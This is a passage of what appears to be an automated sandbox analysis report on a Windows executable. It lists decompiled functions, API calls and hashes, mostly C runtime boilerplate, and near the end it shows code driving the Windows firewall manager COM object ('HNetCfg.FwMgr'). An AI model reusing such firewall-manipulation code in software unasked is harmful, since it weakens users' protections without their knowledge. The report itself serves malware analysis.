                                                                                                                                                                      • Part of subcall function 00B180F0: GetLastError.KERNEL32(?,000000FE,?,00B11112,00000000), ref: 00B18206
                                                                                                                                                                      • Part of subcall function 00B180F0: SysAllocString.OLEAUT32(00000000), ref: 00B18221
                                                                                                                                                                    • _com_util::ConvertStringToBSTR.COMSUPP ref: 00B113A9
                                                                                                                                                                      • Part of subcall function 00B180F0: _malloc.LIBCMT ref: 00B181A1
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 00B113B4
                                                                                                                                                                    • CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B1143C
                                                                                                                                                                    • CoCreateInstance.OLE32(00B1DB2C,00000000,00000001,00B1DB3C,?), ref: 00B114B9
                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B1155C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
                                                                                                                                                                    • String ID: ThunderNetWork
                                                                                                                                                                    • API String ID: 3644708077-3075295172
                                                                                                                                                                    • Opcode ID: 892045051c611f2151a9e5a6e038b56655f8939a9983f96dbb376cde943440d9
                                                                                                                                                                    • Instruction ID: 65b69db05cfb02c8b9df6b6c31b8a5a093effce31166fb3bf39370530822e1b2
                                                                                                                                                                    • Opcode Fuzzy Hash: 892045051c611f2151a9e5a6e038b56655f8939a9983f96dbb376cde943440d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 2571B575A00219EFCB00DFE4C888A9EBBBAFF49714F604499F506EB251CB359A81DF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                    			E00B174CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                    				long _t21;
                                                                                                                                                                    				long _t23;
                                                                                                                                                                    				long _t24;
                                                                                                                                                                    				void* _t25;
                                                                                                                                                                    				long _t31;
                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                    				long _t49;
                                                                                                                                                                    				void* _t52;
                                                                                                                                                                    				void* _t53;
                                                                                                                                                                    
                                                                                                                                                                    				_push(0xc);
                                                                                                                                                                    				_push(0xb1dec8);
                                                                                                                                                                    				E00B13F70(__ebx, __edi, __esi);
                                                                                                                                                                    				_t39 =  *(_t52 + 8);
                                                                                                                                                                    				if(_t39 <= 0) {
                                                                                                                                                                    					L4:
                                                                                                                                                                    					_t49 = _t39 *  *(_t52 + 0xc);
                                                                                                                                                                    					 *(_t52 + 8) = _t49;
                                                                                                                                                                    					__eflags = _t49;
                                                                                                                                                                    					if(_t49 == 0) {
                                                                                                                                                                    						_t49 = 1;
                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                    					}
                                                                                                                                                                    					do {
                                                                                                                                                                    						_t38 = 0;
                                                                                                                                                                    						 *(_t52 - 0x1c) = 0;
                                                                                                                                                                    						__eflags = _t49 - 0xffffffe0;
                                                                                                                                                                    						if(_t49 > 0xffffffe0) {
                                                                                                                                                                    							L13:
                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                    							if(_t38 != 0) {
                                                                                                                                                                    								L21:
                                                                                                                                                                    								_t21 = _t38;
                                                                                                                                                                    								L22:
                                                                                                                                                                    								return E00B13FB5(_t21);
                                                                                                                                                                    							}
                                                                                                                                                                    							__eflags =  *0xb20a20; // 0x0
                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                    								__eflags = _t38;
                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                    									_t23 =  *(_t52 + 0x10);
                                                                                                                                                                    									__eflags = _t23;
                                                                                                                                                                    									if(_t23 != 0) {
                                                                                                                                                                    										 *_t23 = 0xc;
                                                                                                                                                                    									}
                                                                                                                                                                    								}
                                                                                                                                                                    								goto L21;
                                                                                                                                                                    							}
                                                                                                                                                                    							goto L15;
                                                                                                                                                                    						}
                                                                                                                                                                    						__eflags =  *0xb20a98 - 3;
                                                                                                                                                                    						if( *0xb20a98 != 3) {
                                                                                                                                                                    							L11:
                                                                                                                                                                    							__eflags = _t38;
                                                                                                                                                                    							if(_t38 != 0) {
                                                                                                                                                                    								goto L21;
                                                                                                                                                                    							}
                                                                                                                                                                    							L12:
                                                                                                                                                                    							_t25 = RtlAllocateHeap( *0xb2093c, 8, _t49); // executed
                                                                                                                                                                    							_t38 = _t25;
                                                                                                                                                                    							goto L13;
                                                                                                                                                                    						}
                                                                                                                                                                    						_t49 = _t49 + 0x0000000f & 0xfffffff0;
                                                                                                                                                                    						 *(_t52 + 0xc) = _t49;
                                                                                                                                                                    						__eflags =  *(_t52 + 8) -  *0xb20a84; // 0x0
                                                                                                                                                                    						if(__eflags > 0) {
                                                                                                                                                                    							goto L11;
                                                                                                                                                                    						}
                                                                                                                                                                    						E00B13C3D(0, 4);
                                                                                                                                                                    						 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                                    						_push( *(_t52 + 8));
                                                                                                                                                                    						 *(_t52 - 0x1c) = E00B16CFF();
                                                                                                                                                                    						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
                                                                                                                                                                    						E00B175C8();
                                                                                                                                                                    						_t38 =  *(_t52 - 0x1c);
                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                    							goto L12;
                                                                                                                                                                    						}
                                                                                                                                                                    						E00B14E20(0, _t38, 0,  *(_t52 + 8));
                                                                                                                                                                    						_t53 = _t53 + 0xc;
                                                                                                                                                                    						goto L11;
                                                                                                                                                                    						L15:
                                                                                                                                                                    						_t24 = E00B145B5(_t49);
                                                                                                                                                                    						__eflags = _t24;
                                                                                                                                                                    					} while (_t24 != 0);
                                                                                                                                                                    					_t31 =  *(_t52 + 0x10);
                                                                                                                                                                    					__eflags = _t31;
                                                                                                                                                                    					if(_t31 != 0) {
                                                                                                                                                                    						 *_t31 = 0xc;
                                                                                                                                                                    					}
                                                                                                                                                                    					L3:
                                                                                                                                                                    					_t21 = 0;
                                                                                                                                                                    					goto L22;
                                                                                                                                                                    				}
                                                                                                                                                                    				_t32 = 0xffffffe0;
                                                                                                                                                                    				_t33 = _t32 / _t39;
                                                                                                                                                                    				_t45 = _t32 % _t39;
                                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                                    				_t58 = _t33 + 1;
                                                                                                                                                                    				if(_t33 + 1 != 0) {
                                                                                                                                                                    					goto L4;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					 *((intOrPtr*)(E00B138CA(_t58))) = 0xc;
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					_push(0);
                                                                                                                                                                    					E00B13862(_t45, 0, __esi);
                                                                                                                                                                    					goto L3;
                                                                                                                                                                    				}
                                                                                                                                                                    			}















                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00b174f0
                                                                                                                                                                    0x00b174f5
                                                                                                                                                                    0x00b174fb
                                                                                                                                                                    0x00b174fc
                                                                                                                                                                    0x00b174fd
                                                                                                                                                                    0x00b174fe
                                                                                                                                                                    0x00b174ff
                                                                                                                                                                    0x00b17500
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00b17505

                                                                                                                                                                    APIs
                                                                                                                                                                    • __lock.LIBCMT ref: 00B17548
                                                                                                                                                                    • ___sbh_alloc_block.LIBCMT ref: 00B17554
                                                                                                                                                                    • _memset.LIBCMT ref: 00B17575
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00B1DEC8,0000000C,00B15589,00000000,?,00000000,00000000,00000000,?,00B1334F,00000001,00000214,?,00000000), ref: 00B1758A
                                                                                                                                                                      • Part of subcall function 00B138CA: __getptd_noexit.LIBCMT ref: 00B138CA
                                                                                                                                                                      • Part of subcall function 00B13862: __decode_pointer.LIBCMT ref: 00B1386D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3771094184-0
                                                                                                                                                                    • Opcode ID: 9d963ad86b5577467971d14249390fc488db3dc5f6342ae86f38706887203b62
                                                                                                                                                                    • Instruction ID: ea10fec832df753535bc78209039c8abdfb884b4dbdf2b79fa67241099cff08f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9d963ad86b5577467971d14249390fc488db3dc5f6342ae86f38706887203b62
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E2191719886059BCB21AF68CC819DD7BF3FB65760BE486A5F8169B191DF308AC18B40
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00B12087(int _a4) {
                                                                                                                                                                    
                                                                                                                                                                    				E00B1205C(_a4);
                                                                                                                                                                    				ExitProcess(_a4);
                                                                                                                                                                    			}



                                                                                                                                                                    0x00b1208f
                                                                                                                                                                    0x00b12098

                                                                                                                                                                    APIs
                                                                                                                                                                    • ___crtCorExitProcess.LIBCMT ref: 00B1208F
                                                                                                                                                                      • Part of subcall function 00B1205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00B12094,00000000,?,00B1740E,000000FF,0000001E,?,00B1553F,00000000,00000001,00000000,?,00B13BC7,00000018), ref: 00B12066
                                                                                                                                                                      • Part of subcall function 00B1205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B12076
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00B12098
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2427264223-0
                                                                                                                                                                    • Opcode ID: a6ba49612bb44511e2c64a9d120193b9e8a5902d53aae14488af6669f9810053
                                                                                                                                                                    • Instruction ID: 608183d77aa2757645e25242e491c9fe24fe57f64682ae62dc01b89fe4d39705
                                                                                                                                                                    • Opcode Fuzzy Hash: a6ba49612bb44511e2c64a9d120193b9e8a5902d53aae14488af6669f9810053
                                                                                                                                                                    • Instruction Fuzzy Hash: 70B09231000108FBCB212F12DC0E88A7F6AEB853A0B908120F8080A071DF72EDA3EA90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00B14D4A(intOrPtr _a4) {
                                                                                                                                                                    				void* _t6;
                                                                                                                                                                    
                                                                                                                                                                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                                                                                                                                    				 *0xb2093c = _t6;
                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                    					 *0xb20a98 = 1;
                                                                                                                                                                    					return 1;
                                                                                                                                                                    				} else {
                                                                                                                                                                    					return _t6;
                                                                                                                                                                    				}
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00B14D5F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 10892065-0
                                                                                                                                                                    • Opcode ID: 5dd198cab61195b0a79ee66e4a6fa95a50339858cfdeae01cc7d309ee8cceb00
                                                                                                                                                                    • Instruction ID: f93a3a92691233efe9b25659c43872bc4bd44f6deeb434d2053d1643afd309be
                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd198cab61195b0a79ee66e4a6fa95a50339858cfdeae01cc7d309ee8cceb00
                                                                                                                                                                    • Instruction Fuzzy Hash: 0AD05E766A07099EEB106F757C097663BDCD784395F508436B80DC7591EA70C9C1CB00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                    			E00B122A3(intOrPtr _a4) {
                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                    				void* _t2;
                                                                                                                                                                    				void* _t3;
                                                                                                                                                                    				void* _t4;
                                                                                                                                                                    				void* _t5;
                                                                                                                                                                    				void* _t6;
                                                                                                                                                                    				void* _t9;
                                                                                                                                                                    
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_push(0);
                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                    				_t2 = E00B12177(_t3, _t4, _t5, _t6, _t9); // executed
                                                                                                                                                                    				return _t2;
                                                                                                                                                                    			}











                                                                                                                                                                    APIs
                                                                                                                                                                    • _doexit.LIBCMT ref: 00B122AF
                                                                                                                                                                      • Part of subcall function 00B12177: __lock.LIBCMT ref: 00B12185
                                                                                                                                                                      • Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121BC
                                                                                                                                                                      • Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121D1
                                                                                                                                                                      • Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B121FB
                                                                                                                                                                      • Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B12211
                                                                                                                                                                      • Part of subcall function 00B12177: __decode_pointer.LIBCMT ref: 00B1221E
                                                                                                                                                                      • Part of subcall function 00B12177: __initterm.LIBCMT ref: 00B1224D
                                                                                                                                                                      • Part of subcall function 00B12177: __initterm.LIBCMT ref: 00B1225D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1597249276-0
                                                                                                                                                                    • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                    • Instruction ID: 8366765f9ca0f5c8775136addf8c1896c08d446fc4cd1b061f1dc52261baa170
                                                                                                                                                                    • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                    • Instruction Fuzzy Hash: 25B01232A8030C33DA206642EC03F463F4D8BC1B60F640060FB0C2D1E1A9A3B9B2C0C9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CoCreateInstance.OLE32(00B1DB0C,00000000,00000001,00B1DB1C,?,00B11135,00000000), ref: 00B1106A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                                                    • Opcode ID: 3a6507e12a3ace13542bbdea822581890c230a4e01d4cc89352e2de978c5bd4f
                                                                                                                                                                    • Instruction ID: df02c1df6136591fadeabcf87d53bf0d84bf0489c6a68507613ab75beccec241
                                                                                                                                                                    • Opcode Fuzzy Hash: 3a6507e12a3ace13542bbdea822581890c230a4e01d4cc89352e2de978c5bd4f
                                                                                                                                                                    • Instruction Fuzzy Hash: B8B012307C8300F6DD1017505D47FC77EA16740F00F914880B202350F2C6E20090D601
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E00B13148() {
                                                                                                                                                                    				void* _t1;
                                                                                                                                                                    
                                                                                                                                                                    				_t1 = E00B130D6(0); // executed
                                                                                                                                                                    				return _t1;
                                                                                                                                                                    			}





                                                                                                                                                                    APIs
                                                                                                                                                                    • __encode_pointer.LIBCMT ref: 00B1314A
                                                                                                                                                                      • Part of subcall function 00B130D6: TlsGetValue.KERNEL32(00000000,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B130E8
                                                                                                                                                                      • Part of subcall function 00B130D6: TlsGetValue.KERNEL32(00000004,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B130FF
                                                                                                                                                                      • Part of subcall function 00B130D6: RtlEncodePointer.NTDLL(00000000,?,00B1314F,00000000,00B15F7B,00B20398,00000000,00000314,?,00B13A4C,00B20398,Microsoft Visual C++ Runtime Library,00012010), ref: 00B1313D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2585649348-0
                                                                                                                                                                    • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                    • Instruction ID: 4d0dd2b1cf500ad7b8ba5b25daa2cbefbc8947f600ee3cc16652e75599293d77
                                                                                                                                                                    • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                    			E00B11C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                                    				void* _v804;
                                                                                                                                                                    				intOrPtr _v808;
                                                                                                                                                                    				intOrPtr _v812;
                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                    				long _t17;
                                                                                                                                                                    				intOrPtr _t21;
                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                    				intOrPtr* _t31;
                                                                                                                                                                    				void* _t34;
                                                                                                                                                                    
                                                                                                                                                                    				_t27 = __esi;
                                                                                                                                                                    				_t26 = __edi;
                                                                                                                                                                    				_t25 = __edx;
                                                                                                                                                                    				_t22 = __ecx;
                                                                                                                                                                    				_t21 = __ebx;
                                                                                                                                                                    				_t6 = __eax;
                                                                                                                                                                    				_t34 = _t22 -  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				if(_t34 == 0) {
                                                                                                                                                                    					asm("repe ret");
                                                                                                                                                                    				}
                                                                                                                                                                    				 *0xb20128 = _t6;
                                                                                                                                                                    				 *0xb20124 = _t22;
                                                                                                                                                                    				 *0xb20120 = _t25;
                                                                                                                                                                    				 *0xb2011c = _t21;
                                                                                                                                                                    				 *0xb20118 = _t27;
                                                                                                                                                                    				 *0xb20114 = _t26;
                                                                                                                                                                    				 *0xb20140 = ss;
                                                                                                                                                                    				 *0xb20134 = cs;
                                                                                                                                                                    				 *0xb20110 = ds;
                                                                                                                                                                    				 *0xb2010c = es;
                                                                                                                                                                    				 *0xb20108 = fs;
                                                                                                                                                                    				 *0xb20104 = gs;
                                                                                                                                                                    				asm("pushfd");
                                                                                                                                                                    				_pop( *0xb20138);
                                                                                                                                                                    				 *0xb2012c =  *_t31;
                                                                                                                                                                    				 *0xb20130 = _v0;
                                                                                                                                                                    				 *0xb2013c =  &_a4;
                                                                                                                                                                    				 *0xb20078 = 0x10001;
                                                                                                                                                                    				_t11 =  *0xb20130; // 0x0
                                                                                                                                                                    				 *0xb2002c = _t11;
                                                                                                                                                                    				 *0xb20020 = 0xc0000409;
                                                                                                                                                                    				 *0xb20024 = 1;
                                                                                                                                                                    				_t12 =  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				_v812 = _t12;
                                                                                                                                                                    				_t13 =  *0xb1f00c; // 0xefe3e7b5
                                                                                                                                                                    				_v808 = _t13;
                                                                                                                                                                    				 *0xb20070 = IsDebuggerPresent();
                                                                                                                                                                    				_push(1);
                                                                                                                                                                    				E00B14E10(_t14);
                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                    				_t17 = UnhandledExceptionFilter(0xb1c1b4);
                                                                                                                                                                    				if( *0xb20070 == 0) {
                                                                                                                                                                    					_push(1);
                                                                                                                                                                    					E00B14E10(_t17);
                                                                                                                                                                    				}
                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                    			}




















                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B125A7
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B125BC
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00B1C1B4), ref: 00B125C7
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00B125E3
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00B125EA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000019.00000002.333493857.0000000000B11000.00000020.00020000.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                    • Associated: 00000019.00000002.333483672.0000000000B10000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333505191.0000000000B1C000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333514254.0000000000B1F000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000019.00000002.333521365.0000000000B21000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                    • Opcode ID: 4c6ccf5d0c79081fd37a8f430cacad1e68a7c4298e5fcba1d4b6dec94ae8d321
                                                                                                                                                                    • Instruction ID: b2bf1619432e4721063dd63a68eb6664ce2fe76fcc3755d7ef83ef89040d5eff
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c6ccf5d0c79081fd37a8f430cacad1e68a7c4298e5fcba1d4b6dec94ae8d321
                                                                                                                                                                    • Instruction Fuzzy Hash: 9221C3B4861208DFD721EF64F84A6847BE0BB0C312F80815AF508A7662DF7456A6CF49
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                                    			E00B117BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                    				char _v24;
                                                                                                                                                                    				void* _v28;
                                                                                                                                                                    				void* _v32;
                                                                                                                                                                    				void* _v36;
                                                                                                                                                                    				void* _v40;
                                                                                                                                                                    				void* _v44;
                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                    				void* __edi;
                                                                                                                                                                    				void* __esi;
                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                    				void* _t59;
                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                    				intOrPtr* _t62;
                                                                                                                                                                    				intOrPtr* _t63;
                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                    				void* _t74;
                                                                                                                                                                    				intOrPtr* _t75;
                                                                                                                                                                    				void* _t76;
                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                    				void* _t78;
                                                                                                                                                                    				void* _t80;
                                                                                                                                                                    				void* _t83;
                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                    				intOrPtr* _t92;
                                                                                                                                                                    				intOrPtr* _t94;
                                                                                                                                                                    				intOrPtr* _t96;
                                                                                                                                                                    				void* _t97;
                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                    				intOrPtr* _t100;
                                                                                                                                                                    				signed int _t120;
                                                                                                                                                                    
                                                                                                                                                                    				_t115 = __edx;
                                                                                                                                                                    				_t54 =  *0xb1f008; // 0x101c184a
                                                                                                                                                                    				_v8 = _t54 ^ _t120;
                                                                                                                                                                    				_v52 = _a4;
                                                                                                                                                                    				_v48 = _a8;
                                                                                                                                                                    				__imp__CoInitialize(0);
                                                                                                                                                                    				_v36 = 0;
                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                    				_t59 = E00B180F0(__edx, "HNetCfg.FwMgr");
                                                                                                                                                                    				__imp__CLSIDFromProgID(_t59,  &_v24);
                                                                                                                                                                    				_t117 = _t59;
                                                                                                                                                                    				if(_t59 >= 0) {
                                                                                                                                                                    					_t100 = __imp__CoCreateInstance;
                                                                                                                                                                    					_t74 =  *_t100( &_v24, 0, 5, 0xb1c17c,  &_v36);
                                                                                                                                                                    					_t117 = _t74;
                                                                                                                                                                    					if(_t74 >= 0) {
                                                                                                                                                                    						_t75 = _v36;
                                                                                                                                                                    						_t115 =  &_v32;
                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
                                                                                                                                                                    						_t117 = _t76;
                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                    							_t77 = _v32;
                                                                                                                                                                    							_t115 =  &_v40;
                                                                                                                                                                    							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
                                                                                                                                                                    							_t117 = _t78;
                                                                                                                                                                    							if(_t78 >= 0) {
